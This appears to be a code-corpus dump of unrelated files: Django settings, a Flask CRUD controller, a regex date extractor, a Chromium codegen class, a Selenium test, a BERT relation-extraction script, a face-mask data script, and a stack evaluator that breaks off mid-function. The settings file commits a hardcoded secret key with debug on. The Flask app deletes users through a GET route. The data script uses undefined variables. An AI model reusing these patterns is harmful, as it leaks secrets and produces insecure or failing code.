f5b8678585e77ba97a9bda55aebd96c14fe54d1e | e8a6b1a3d378ac212afee93b1cdb68ae009edbcd | /uhac/uhac/settings.py | f0dc8acbc5b641b854bf476a83bf4e00a265bd78 | [] | no_license | SmbCantos/UHACK3 | 33e27163bebd884ea3b9efde58f735c4bd267980 | 71233a6b54fb537ff00671456c24735a3318bbec | refs/heads/master | 2021-06-11T11:36:32.405493 | 2016-11-26T13:08:02 | 2016-11-26T13:08:02 | 74,825,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,113 | py | """
Django settings for uhac project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment before deploying.
SECRET_KEY = 'z$2c2r+cfz_!^mtj@s_z-y^n*t^$peyn*ck(z_ah2yx)ok)9ma'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Project apps
    'home',
    'chat'
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'uhac.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'uhac.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/

STATIC_URL = '/static/'
| [
"fjcamillo.dev@gmail.com"
] | fjcamillo.dev@gmail.com |
ff22fd675b4bd081cce28221000cb0a7164d32b9 | 2478e5414404819e0629ea5f8ca7a83f836ba733 | /flask_mysql/crud/users_CRUD_modular/flask_app/controllers/users.py | 00c8192aed532e81d42ff27fffe05d848de326ad | [] | no_license | Carpe-liam/python | 07b380ff16c1f6f31cfa1fa4a7ccbd7ae420245b | 23f0c042666356027e59ae582d401896e173bf15 | refs/heads/master | 2023-08-15T03:09:03.037502 | 2021-09-25T04:45:44 | 2021-09-25T04:45:44 | 401,517,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,548 | py | from flask_app import app
from flask import render_template, redirect, request, session, flash
from flask_app.models.user import User
@app.route('/')
def index():
return render_template("index.html")
@app.route('/users')
def read():
users = User.get_all()
print(users)
return render_template("read.html", users=users)
@app.route('/users/new')
def create():
return render_template("create.html")
@app.route('/create_user', methods=["POST"])
def create_user():
data = {
"first_name" : request.form["first_name"],
"last_name" : request.form["last_name"],
"email" : request.form["email"]
}
User.save(data)
return redirect('/users')
@app.route('/users/<int:userID>/edit')
def edit(userID):
data = {
'userID' : userID,
}
user = User.get_one(data)
return render_template("edit.html", user = user)
@app.route('/update/<int:userID>', methods=["POST"])
def update(userID):
data = {
'userID' : userID,
"first_name" : request.form["first_name"],
"last_name" : request.form["last_name"],
"email" : request.form["email"]
}
User.edit(data)
return redirect(f'/users/{userID}')
@app.route('/users/<int:userID>')
def show_info(userID):
data = {
'userID': userID
}
user = User.get_one(data)
return render_template("show_info.html", user = user)
@app.route('/users/<int:userID>/destroy')
def delete(userID):
data = {
'userID' : userID
}
User.delete(data)
return redirect('/users') | [
"alexander.liam.tyler@gmail.com"
] | alexander.liam.tyler@gmail.com |
9b8228925ff7e3762993eca77625969608252ee0 | a3326328b60a125de3cdd473519a3cee751347c6 | /Codigos/ExpresionesRegulares.py | dc1703d0c026add443942a392f95465e1a165bd2 | [] | no_license | villarj/TFM-LogCluster-for-Event-Logs | d1f3fbf5d25f2902203ffc472da5bbd916414ff8 | 1583145141ae87d3cc213c58160b42543a16f2d5 | refs/heads/master | 2020-03-18T06:08:29.933587 | 2018-09-11T17:15:38 | 2018-09-11T17:15:38 | 134,378,407 | 0 | 1 | null | 2018-05-22T07:43:31 | 2018-05-22T07:39:12 | Python | UTF-8 | Python | false | false | 8,169 | py | import regex as re
#Vamos a crear una clase que nos encontrara los patrones deseados.
class findPattern():
#Definimos los patrones que se quieren buscar.
MONTHS_PATTERN = 'january|february|march|april|may|june|july|august|september|october|november|december|jan|feb|mar|apr|may|jun|jul|aug|sep|sept|oct|nov|dec'
DAYS_PATTERN = 'monday|tuesday|wednesday|thursday|friday|saturday|sunday|mon|tue|tues|wed|thur|thurs|fri|sat|sun'
DIGITS_PATTERN = '[^A-Za-z|\.]\d+'
DELIMITERS_PATTERN = '[\-\,\s\_\+\@]+'
TIME_PERIOD_PATTERN = 'a\.m\.|am|p\.m\.|pm'
##Caracteres que se pueden eliminar de los extremos cuando hay cadenas combinadas.
STRIP_CHARS = ' \n\t:-.,_'
#Patron definido para encontrar la hora.
TIME_PATTERN = """
(?P<time>
## Captures in format XX:YY(:ZZ)
(
(?P<hours>\d{{2,2}})
\:
(?P<minutes>\d{{1,2}})
\:
(?P<seconds>\d{{1,2}})
\.
(?P<miliseconds>\d{{3,3}})
\s*\+
(?P<resto>\d{{2,2}})
\:
(?P<resto2>\d{{2,2}})
)
|
(
(?P<hours>\d{{1,2}})
\:
(?P<minutes>\d{{1,2}})
(\:(?<seconds>\d{{1,2}}))
\s*
(?P<time_periods>{time_periods})?
)
)
""".format(
time_periods=TIME_PERIOD_PATTERN
)
DATES_PATTERN = """
(
## Grab any digits
(
(?P<months>{months})
(?P<delimiters>{delimiters})
(?P<days>\d{{1,2}})
(?P<delimiters>{delimiters})?
(?P<year>\d{{4}})?
)
|
(
(?P<days>\d{{1,2}})
(?P<delimiters>{delimiters})
(?P<months>{months})
)
|
(
(?P<year>\d{{2,4}})
(?P<delimiters>{delimiters})
(?P<months>\d{{1,2}})
(?P<delimiters>{delimiters})
(?P<days>\d{{1,2}})
)
)
"""
DATES_PATTERN = DATES_PATTERN.format(
digits=DIGITS_PATTERN,
months=MONTHS_PATTERN,
delimiters=DELIMITERS_PATTERN
)
#Compilamos para hacer las expresiones regulares.
#Para fechas
DATE_REGEX = re.compile(DATES_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL | re.VERBOSE)
#Para horas
TIME_REGEX = re.compile(TIME_PATTERN, re.IGNORECASE | re.MULTILINE | re.UNICODE | re.DOTALL | re.VERBOSE)
#Creamos el constructor de la clase
def __init__(self, base_date=None):
self.base_date = base_date
#Creamos un metodo que busque las fechas.
def find_dates(self, text, source=False, index=False, strict=False):
for date_string, indices, captures in self.extract_date_strings(text, strict=strict):
#as_dt = self.parse_date_string(date_string, captures)
if date_string is None:
## Dateutil couldn't make heads or tails of it
## move on to next
continue
returnables = (date_string,)
if source:
returnables = returnables + (date_string,)
if index:
returnables = returnables + (indices,)
if len(returnables) == 1:
returnables = returnables[0]
yield returnables
#Funcion que escane el texto buscando formatos de fechas
def extract_date_strings(self, text, strict=False):
#Buscamos en el texto las posibles cadenas candidatas a ser una fecha.
for match in self.DATE_REGEX.finditer(text):
match_str = match.group(0)
indices = match.span(0)
## Get individual group matches
captures = match.capturesdict()
months = captures.get('months')[0]
days = captures.get('days')[0]
if(len(months)<=2):
months=int(months)
if(len(days)<=2):
days=int(days)
if(type(months)==unicode):
months=str(months)
if((type(months)==int and months<=12) or type(months)==str):
if((type(days)==int and days<=31) or type(days)==str):
## sanitize date string
## replace unhelpful whitespace characters with single whitespace
match_str = re.sub('[\n\t\s\xa0]+', ' ', match_str)
match_str = match_str.strip(self.STRIP_CHARS)
## Save sanitized source string
yield match_str, indices, captures
def find_time(self, text, source=False, index=False, strict=False):
for date_string, indices, captures in self.extract_time_strings(text, strict=strict):
if date_string is None:
## Dateutil couldn't make heads or tails of it
## move on to next
continue
returnables = (date_string,)
if source:
returnables = returnables + (date_string,)
if index:
returnables = returnables + (indices,)
if len(returnables) == 1:
returnables = returnables[0]
yield returnables
#Funcion que busca formato de fechas por el texto y lo extrae.
def extract_time_strings(self, text, strict=False):
#Buscamos en el texto las posibles cadenas candidatas a ser una hora.
for match in self.TIME_REGEX.finditer(text):
#Almacenamos en una variable la cadena candidata encontrada.
match_str = match.group(0)
#Almacenamos en la variable indices (tupla) los indices en el cual empieza la cadena y
#en el que termina.
indices = match.span(0)
#Obtenemos los resultados de forma indidual para realizar las comprobaciones.
captures = match.capturesdict()
horas = int(captures.get('hours')[0])
minutos=int(captures.get('minutes')[0])
segundos = captures.get('seconds')
if(len(segundos)>0):
segundos=int(segundos[0])
#Comprobamos que las horas, minutos y segundos tienen valores correctos.
if(horas >=0 and horas<24 and minutos>=0 and minutos<=59 and((type(segundos)==int and segundos>=0 and segundos<60) or type(segundos)==list)):
#Limpiamos el string de fechas
match_str = re.sub('[\n\t\s\xa0]+', ' ', match_str)
#Reemplazamos el conjunto de espacios en blanco inutiles por espacios en blanco individuales.
match_str = match_str.strip(self.STRIP_CHARS)
## Save sanitized source string
yield match_str, indices, captures
#Buscamos las fechas
def find_dates(text,source=False,index=False,strict=False,base_date=None):
date_finder = findPattern(base_date=base_date)
return date_finder.find_dates(text, source=source, index=index, strict=strict)
def find_time(text,source=False,index=False,strict=False,base_date=None):
"""
Extract datetime strings from text
:param text:
A string that contains one or more natural language or literal
datetime strings
:type text: str|unicode
:param source:
Return the original string segment
:type source: boolean
:param index:
Return the indices where the datetime string was located in text
:type index: boolean
:param strict:
Only return datetimes with complete date information. For example:
`July 2016` of `Monday` will not return datetimes.
`May 16, 2015` will return datetimes.
:type strict: boolean
:param base_date:
Set a default base datetime when parsing incomplete dates
:type base_date: datetime
:return: Returns a generator that produces :mod:`datetime.datetime` objects,
or a tuple with the source text and index, if requested
"""
time_finder = findPattern(base_date=base_date)
return time_finder.find_time(text, source=source, index=index, strict=strict) | [
"villarj@ifca.unican.es"
] | villarj@ifca.unican.es |
674ded63f9ecd7d257210fd5b0bc3cc5693b7ef1 | 2834f98b53d78bafc9f765344ded24cf41ffebb0 | /third_party/blink/renderer/bindings/scripts/bind_gen/codegen_context.py | 8b06e8788988d91bc42b0326dd58240ca4dcf6e6 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0"
] | permissive | cea56/chromium | 81bffdf706df8b356c2e821c1a299f9d4bd4c620 | 013d244f2a747275da76758d2e6240f88c0165dd | refs/heads/master | 2023-01-11T05:44:41.185820 | 2019-12-09T04:14:16 | 2019-12-09T04:14:16 | 226,785,888 | 1 | 0 | BSD-3-Clause | 2019-12-09T04:40:07 | 2019-12-09T04:40:07 | null | UTF-8 | Python | false | false | 7,406 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
from . import name_style
from .path_manager import PathManager
class CodeGenContext(object):
"""
Represents a context of code generation.
Note that this is not relevant to Mako template context or any contexts.
Also note that CodeGenContext's attributes will be global template
variables. |CodeGenContext.interface| will be available in templates as
"${interface}".
"""
# "for_world" attribute values
MAIN_WORLD = "main"
ALL_WORLDS = "all"
@classmethod
def init(cls):
"""Initialize the class. Must be called exactly once."""
assert not hasattr(cls, "_was_initialized"), "Do not call twice."
cls._was_initialized = True
# List of
# attribute name: default value
cls._context_attrs = {
# Top-level definition
"callback_function": None,
"callback_interface": None,
"dictionary": None,
"enumeration": None,
"interface": None,
"namespace": None,
"typedef": None,
"union": None,
# Class-member-ish definition
"attribute": None,
"attribute_get": False,
"attribute_set": False,
"constant": None,
"constructor": None,
"constructor_group": None,
"dict_member": None,
"operation": None,
"operation_group": None,
# Main world or all worlds
"for_world": cls.ALL_WORLDS,
}
# List of computational attribute names
cls._computational_attrs = (
"class_like",
"function_like",
"idl_definition",
"idl_location",
"idl_location_and_name",
"idl_name",
"is_return_by_argument",
"may_throw_exception",
"member_like",
"property_",
"return_type",
"v8_class",
)
# Define public readonly properties of this class.
for attr in cls._context_attrs.iterkeys():
def make_get():
_attr = cls._internal_attr(attr)
def get(self):
return getattr(self, _attr)
return get
setattr(cls, attr, property(make_get()))
@staticmethod
def _internal_attr(attr):
return "_{}".format(attr)
def __init__(self, **kwargs):
assert CodeGenContext._was_initialized
for arg in kwargs.iterkeys():
assert arg in self._context_attrs, "Unknown argument: {}".format(
arg)
for attr, default_value in self._context_attrs.iteritems():
value = kwargs[attr] if attr in kwargs else default_value
assert (default_value is None
or type(value) is type(default_value)), (
"Type mismatch at argument: {}".format(attr))
setattr(self, self._internal_attr(attr), value)
def make_copy(self, **kwargs):
"""
Returns a copy of this context applying the updates given as the
arguments.
"""
for arg in kwargs.iterkeys():
assert arg in self._context_attrs, "Unknown argument: {}".format(
arg)
new_object = copy.copy(self)
for attr, new_value in kwargs.iteritems():
old_value = getattr(self, attr)
assert old_value is None or type(new_value) is type(old_value), (
"Type mismatch at argument: {}".format(attr))
setattr(new_object, self._internal_attr(attr), new_value)
return new_object
def template_bindings(self):
"""
Returns a bindings object to be passed into
|CodeNode.add_template_vars|. Only properties with a non-None value are
bound so that it's easy to detect invalid use cases (use of an unbound
template variable raises a NameError).
"""
bindings = {}
for attr in self._context_attrs.iterkeys():
value = getattr(self, attr)
if value is not None:
bindings[attr] = value
for attr in self._computational_attrs:
value = getattr(self, attr)
if value is not None:
bindings[attr.strip("_")] = value
return bindings
@property
def class_like(self):
return (self.callback_interface or self.dictionary or self.interface
or self.namespace)
@property
def function_like(self):
return (self.callback_function or self.constructor or self.operation)
@property
def idl_definition(self):
return (self.callback_function or self.callback_interface
or self.dictionary or self.enumeration or self.interface
or self.namespace or self.typedef or self.union)
@property
def idl_location(self):
idl_def = self.member_like or self.idl_definition
if idl_def:
location = idl_def.debug_info.location
text = PathManager.relpath_to_project_root(location.filepath)
if location.line_number is not None:
text += ":{}".format(location.line_number)
return text
return "<<unknown path>>"
@property
def idl_location_and_name(self):
return "{}: {}".format(self.idl_location, self.idl_name)
@property
def idl_name(self):
member = self.member_like or self.property_
if member:
return "{}.{}".format(self.class_like.identifier,
member.identifier)
if self.idl_definition:
return self.idl_definition.identifier
return "<<unknown name>>"
@property
def is_return_by_argument(self):
if self.return_type is None:
return None
return_type = self.return_type.unwrap()
return return_type.is_dictionary or return_type.is_union
@property
def may_throw_exception(self):
if not self.member_like:
return None
ext_attr = self.member_like.extended_attributes.get("RaisesException")
if not ext_attr:
return False
return (not ext_attr.values
or (self.attribute_get and "Getter" in ext_attr.values)
or (self.attribute_set and "Setter" in ext_attr.values))
@property
def member_like(self):
return (self.attribute or self.constant or self.constructor
or self.dict_member or self.operation)
@property
def property_(self):
return (self.attribute or self.constant or self.constructor_group
or self.dict_member or self.operation_group)
@property
def return_type(self):
if self.attribute_get:
return self.attribute.idl_type
if self.callback_function:
return self.callback_function.return_type
if self.operation:
return self.operation.return_type
return None
@property
def v8_class(self):
if not self.idl_definition:
return None
return name_style.class_("v8", self.idl_definition.identifier)
CodeGenContext.init()
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
3d976c2385b5fd2a293ffb59931822dc483ebdf8 | 920202f7c93d8fe2e1063c8576a3daa0d2d61864 | /test_case_6.py | 8c6a03748b2f01c8b3e75de475baa3f5921a7c2f | [] | no_license | JuliaFedyaeva/autotests_python | 3d1f2f25096345c3894d90746d39a7f08442f82e | b777a5bbc191c34ab8b5dccefcceef821aae2c79 | refs/heads/master | 2022-12-26T14:00:18.930862 | 2020-09-28T11:34:06 | 2020-09-28T11:34:06 | 294,995,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,383 | py | import locators as _locators
import pytest
import utils
import test_data
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
@pytest.mark.xfail(reason="It's a negative test")
def test_payment_without_card(browser):
    """Negative checkout test: the payment button must stay disabled
    when the card fields are left empty.

    Flow: log in, add an item to the cart, fill the shipping address,
    reach the payment step without entering card data, then assert the
    pay button is disabled.
    """
    # Data
    heading_shipping_locator = 'div.sub-header h1'
    country_locator = 'select#id_country'
    heading_payment_locator = 'div.sub-header h1'
    page_payment_heading = 'Введите параметры платежа'
    page_shipping_heading = 'Адрес доставки'
    # Arrange
    browser.get(_locators.main_page_link)
    utils.find(browser, _locators.login_link).click()
    utils.authorizate(browser, test_data.email, test_data.password)
    WebDriverWait(browser, 12).until(
        EC.presence_of_element_located((By.XPATH, _locators.success_message_locator))
    )
    success_message_text = utils.find_xpath(browser, _locators.success_message_locator).text
    assert _locators.success_message in success_message_text, \
        "Search success message '%s' should contain text '%s'" % (success_message_text, _locators.success_message)
    WebDriverWait(browser, 12).until(
        EC.presence_of_element_located((By.XPATH, _locators.catalog_link))
    )
    utils.find_xpath(browser, _locators.catalog_link).click()
    page_catalog_detector = utils.find(browser, _locators.catalog_heading_locator).text
    assert _locators.catalog_heading in page_catalog_detector, \
        "Search heading '%s' should contain text '%s'" % (page_catalog_detector, _locators.catalog_heading)
    utils.click_add_to_cart(browser)
    WebDriverWait(browser, 12).until(
        EC.presence_of_element_located((By.CSS_SELECTOR, _locators.button_view_cart))
    )
    utils.view_cart(browser)
    # Steps
    utils.find(browser, _locators.button_to_order).click()
    page_shipping_detector = utils.find(browser, heading_shipping_locator).text
    assert page_shipping_heading in page_shipping_detector, \
        "Search heading '%s' should contain text '%s'" % (page_shipping_detector, heading_shipping_locator)
    WebDriverWait(browser, 12).until(
        EC.presence_of_element_located((By.CSS_SELECTOR, heading_shipping_locator))
    )
    utils.set_address(browser, test_data.name, test_data.lastname, test_data.address, test_data.city, test_data.postcode, country_locator, test_data.country)
    utils.click_next_step_order(browser)
    # NOTE: there is no delivery-method step on this site -- the flow jumps
    # straight from the address form to the payment step.
    WebDriverWait(browser, 12).until(
        EC.presence_of_element_located((By.CSS_SELECTOR, heading_payment_locator))
    )
    page_payment_detector = utils.find(browser, heading_payment_locator).text
    assert page_payment_heading in page_payment_detector
    # The card fields are intentionally left empty here.
    WebDriverWait(browser, 12).until(
        EC.presence_of_element_located((By.CSS_SELECTOR, _locators.link_to_payment))
    )
    # Assert
    # Fixed: the original called the Java-style ``getAttribute`` on the
    # locator string itself (and then ``click()`` on the returned string).
    # Resolve the element first and use WebElement.get_attribute().
    payment_button = utils.find(browser, _locators.link_to_payment)
    button_disabled = payment_button.get_attribute('disabled')
    assert button_disabled == "true", "No disabled button on payment page"
    payment_button.click()
| [
"julia.fedyaeva@mail.ru"
] | julia.fedyaeva@mail.ru |
3288a5d507b48c805c130854b0793d855808c410 | 11c2fae3b7a8547fe31c2340192f3183bc86ebae | /test/relation_extract_test.py | 67ad1f808570ec6a4fc4a617148c2f069e740748 | [
"Apache-2.0"
] | permissive | SusannaWull/bert_seq2seq | 86ff2229d9c6048475a958477e873d1dce6e19a1 | 5e2991a004a5f1ceeb76571f33c796355d10b8f7 | refs/heads/master | 2023-07-01T14:39:29.481005 | 2021-08-05T06:23:08 | 2021-08-05T06:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,484 | py | import torch
import torch.nn as nn
import sys
sys.path.append("/Users/xingzhaohu/Downloads/code/python/ml/ml_code/bert/bert_seq2seq")
from torch.optim import Adam
import pandas as pd
import numpy as np
import os
import json
import time
import bert_seq2seq
from bert_seq2seq.tokenizer import Tokenizer, load_chinese_base_vocab
from bert_seq2seq.utils import load_bert
relation_extrac_model = "./state_dict/bert_model_relation_extrac.bin"
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
vocab_path = "./state_dict/roberta_wwm_vocab.txt" # roberta模型字典的位置
model_name = "roberta" # 选择模型名字
# model_path = "./state_dict/bert-base-chinese-pytorch_model.bin" # roberta模型位
# 加载字典
word2idx = load_chinese_base_vocab(vocab_path, simplfied=False)
tokenizer = Tokenizer(word2idx)
idx2word = {v: k for k, v in word2idx.items()}
predicate2id, id2predicate = {}, {}
with open('./corpus/三元组抽取/all_50_schemas') as f:
for l in f:
l = json.loads(l)
if l['predicate'] not in predicate2id:
id2predicate[len(predicate2id)] = l['predicate']
predicate2id[l['predicate']] = len(predicate2id)
def search(pattern, sequence):
"""从sequence中寻找子串pattern
如果找到,返回第一个下标;否则返回-1。
"""
n = len(pattern)
for i in range(len(sequence)):
if sequence[i:i + n] == pattern:
return i
return -1
def search_subject(token_ids, subject_labels):
# subject_labels: (lens, 2)
if type(subject_labels) is torch.Tensor:
subject_labels = subject_labels.numpy()
if type(token_ids) is torch.Tensor:
token_ids = token_ids.cpu().numpy()
subjects = []
subject_ids = []
start = -1
end = -1
for i in range(len(token_ids)):
if subject_labels[i, 0] > 0.5:
start = i
for j in range(len(token_ids)):
if subject_labels[j, 1] > 0.5:
subject_labels[j, 1] = 0
end = j
break
if start == -1 or end == -1:
continue
subject = ""
for k in range(start, end + 1):
subject += idx2word[token_ids[k]]
# print(subject)
subject_ids.append([start, end])
start = -1
end = -1
subjects.append(subject)
return subjects, subject_ids
def search_object(token_ids, object_labels):
objects = []
if type(object_labels) is torch.Tensor:
object_labels = object_labels.numpy()
if type(token_ids) is torch.Tensor:
token_ids = token_ids.cpu().numpy()
# print(object_labels.sum())
start = np.where(object_labels[:, :, 0] > 0.5)
end = np.where(object_labels[:, :, 1] > 0.5)
# print(start)
# print(end)
for _start, predicate1 in zip(*start):
for _end, predicate2 in zip(*end):
if _start <= _end and predicate1 == predicate2:
object_text = ""
for k in range(_start, _end + 1):
# print(token_ids(k))
object_text += idx2word[token_ids[k]]
objects.append(
(id2predicate[predicate1], object_text)
)
break
return objects
if __name__ == "__main__":
# 定义模型
bert_model = load_bert(word2idx, model_class="relation_extrac", model_name=model_name, target_size=len(predicate2id))
bert_model.eval()
bert_model.set_device(device)
# ## 加载预训练的模型参数~
checkpoint = torch.load(relation_extrac_model, map_location="cpu")
# print(checkpoint)
bert_model.load_all_params(model_path=relation_extrac_model, device=device)
text = ["查尔斯·阿兰基斯(Charles Aránguiz),1989年4月17日出生于智利圣地亚哥,智利职业足球运动员,司职中场,效力于德国足球甲级联赛勒沃库森足球俱乐部",
"《星空黑夜传奇》是连载于起点中文网的网络小说,作者是啤酒的罪孽",
"《李烈钧自述》是2011年11月1日人民日报出版社出版的图书,作者是李烈钧",
"杨铁心和郭啸天兄弟二人在牛家村的农屋里喝酒,他们的岳飞大将军在风波亭被害之事,二人希望能够像岳飞大将军一样精忠报国。"]
for d in text:
with torch.no_grad():
token_ids_test, segment_ids = tokenizer.encode(d, max_length=256)
token_ids_test = torch.tensor(token_ids_test, device=device).view(1, -1)
# 先预测subject
pred_subject = bert_model.predict_subject(token_ids_test, device=device)
pred_subject = pred_subject.squeeze(0)
subject_texts, subject_idss = search_subject(token_ids_test[0], pred_subject.cpu())
if len(subject_texts) == 0:
print("no subject predicted~")
for sub_text, sub_ids in zip(subject_texts, subject_idss):
print("subject is " + str(sub_text))
sub_ids = torch.tensor(sub_ids, device=device).view(1, -1)
# print("sub_ids shape is " + str(sub_ids))
object_p_pred = bert_model.predict_object_predicate(token_ids_test, sub_ids, device=device)
res = search_object(token_ids_test[0], object_p_pred.squeeze(0).cpu())
print("p and obj is " + str(res))
| [
"920232796@qq.com"
] | 920232796@qq.com |
eb82622e182e44628fdc26aef95db713eff0f165 | 326c1216782633f493d15730150d8f41db177e2f | /data_process.py | ccc79a77b118be7713254d2c88975e5168bb9486 | [] | no_license | JiaojiaoYe1994/face-segmentation | 0cfc10776cd5deb8974530d3fd10a417edb00237 | bdb8ffccf7d3aaa6785d7869fd7a7ddb7b056764 | refs/heads/master | 2022-12-21T18:42:52.917032 | 2020-09-22T09:34:01 | 2020-09-22T09:34:01 | 292,716,024 | 0 | 0 | null | 2020-09-04T01:12:31 | 2020-09-04T01:12:30 | null | UTF-8 | Python | false | false | 1,696 | py | '''
This script works for dataset preparation. The dataset used in this project comes from multiple source
and each dataset has different format. We process each dataset accordingly and finally combine them to the final
dataset.
Dataset Source:
1. CelebA: https://www.kaggle.com/jessicali9530/celeba-dataset
2. Exemplar-Based Face Parsing: http://pages.cs.wisc.edu/~lizhang/projects/face-parsing/
3. Labeled Faces in the Wild: http://vis-www.cs.umass.edu/lfw/
The final train dataset consists of the following folder:
/images
/masks
'''
import os
import glob
import sys
import cv2
from PIL import Image
import numpy as np
root = '~/SmithCVPR2013_dataset_resized'
# img_pth = os.path.join(root, 'images')
# label_dir = os.path.join(root, 'labels')
# mask_dir = '/home/jiaojiao/jiaojiao/project/dubhe/face-segmentation/datasets/SmithCVPR2013_dataset_resized/masks'
label_pth = glob.glob(label_pth+'/*')
print('Dataset size: ', len(labels_files))
label = glob.glob(labels_files[0]+'/*[1-9].png')
def helen_combine_seg(path, out_dir=None):
    """Merge the per-part label images of one Helen sample into one mask.

    Each sample directory contains files ``<name>_1.png`` .. ``<name>_9.png``
    (one image per facial part); summing them yields a single combined
    segmentation mask, saved as ``<name>.bmp`` in ``out_dir``.

    :param path: directory holding the per-part label images of one sample
    :param out_dir: destination directory for the combined mask; defaults
        to ``<root>/masks``. (Fixed: the original referenced a global
        ``mask_dir`` that is commented out above, raising NameError.)
        NOTE(review): ``root`` uses an unexpanded ``~`` -- confirm it is
        expanded (os.path.expanduser) before running.
    """
    if out_dir is None:
        out_dir = os.path.join(root, 'masks')
    label = glob.glob(path + '/*[1-9].png')
    # The sample name is the directory component of the first label file.
    name = label[0].split('/')[-2]
    mask = np.zeros(np.array(Image.open(label[0])).shape)
    for f_p in label:
        bmp = Image.open(f_p)
        mask += np.array(bmp)
    mask = Image.fromarray(np.uint8(mask))
    save_path = os.path.join(out_dir, name + '.bmp')
    mask.save(save_path)
def helen_process(root):
    """Combine the part labels of every sample under ``root``/labels into
    single-mask images written to ``root``/masks."""
    label_dir = os.path.join(root, 'labels')
    mask_dir = os.path.join(root, 'masks')
    label_pth = glob.glob(label_dir + '/*')
    # Fixed: the original iterated the undefined name ``labels_pth``
    # (NameError) instead of ``label_pth`` built on the line above, and
    # never passed the computed ``mask_dir`` to the combiner.
    for p in label_pth:
        helen_combine_seg(p, mask_dir)
def main():
    helen_process(root)
if __name__ == "__main__":
    main()
"jiaojiaoye2016@gmail.com"
] | jiaojiaoye2016@gmail.com |
60d2fb6c1f5ea8c3c6bb6cfceeb60d70f07d871f | 19f698ab74cba74ae52c780f5986d273fb319308 | /SWExpertAcademy/D4/1232.py | 209942da9fe5a71e6e5177f96a34335d03fa5316 | [] | no_license | naye0ng/Algorithm | 15023f1070eb7cc5faca9cf7154af2ecffab92c2 | 1e8848e3e2574b01dc239212ea084b0a4837bc03 | refs/heads/master | 2021-06-25T14:18:46.117411 | 2020-10-16T10:47:37 | 2020-10-16T10:47:37 | 149,326,399 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,351 | py | """
1232.사칙연산
"""
import sys
sys.stdin = open('input.txt','r')
class Stack() :
    """Minimal LIFO stack used to evaluate the expression tree.

    Keeps ``top`` (index of the current top element, -1 when empty) in
    sync with the underlying ``stack`` list, preserving the original
    public attributes and methods.
    """
    def __init__(self):
        self.top = -1      # index of the top element; -1 means empty
        self.stack = []    # underlying storage; top element is last
    def push(self, data):
        """Push ``data`` onto the stack."""
        self.stack.append(data)   # O(1) amortized instead of list rebuild
        self.top += 1
    def pop(self):
        """Remove and return the top element (assumes a non-empty stack)."""
        self.top -= 1
        # Fixed inefficiency: the original sliced a full copy of the list
        # on every pop (O(n)); list.pop() removes the last element in O(1).
        return self.stack.pop()
return temp
def inorder(t) :
    """Evaluate the expression tree rooted at node ``t``.

    Despite the name this is a *postorder* walk: both children are
    evaluated before the node itself. Operands are pushed onto the global
    ``stack``; operator nodes pop two operands and push the result.
    Relies on the module globals ``tree`` (node table) and ``stack``.
    """
    if t :
        inorder(tree[t][1])
        inorder(tree[t][2])
        if type(tree[t][0]) == int :
            # Leaf: push the operand value.
            stack.push(tree[t][0])
        else :
            # Operator node: pop right (x) then left (y) operand.
            x = stack.pop()
            y = stack.pop()
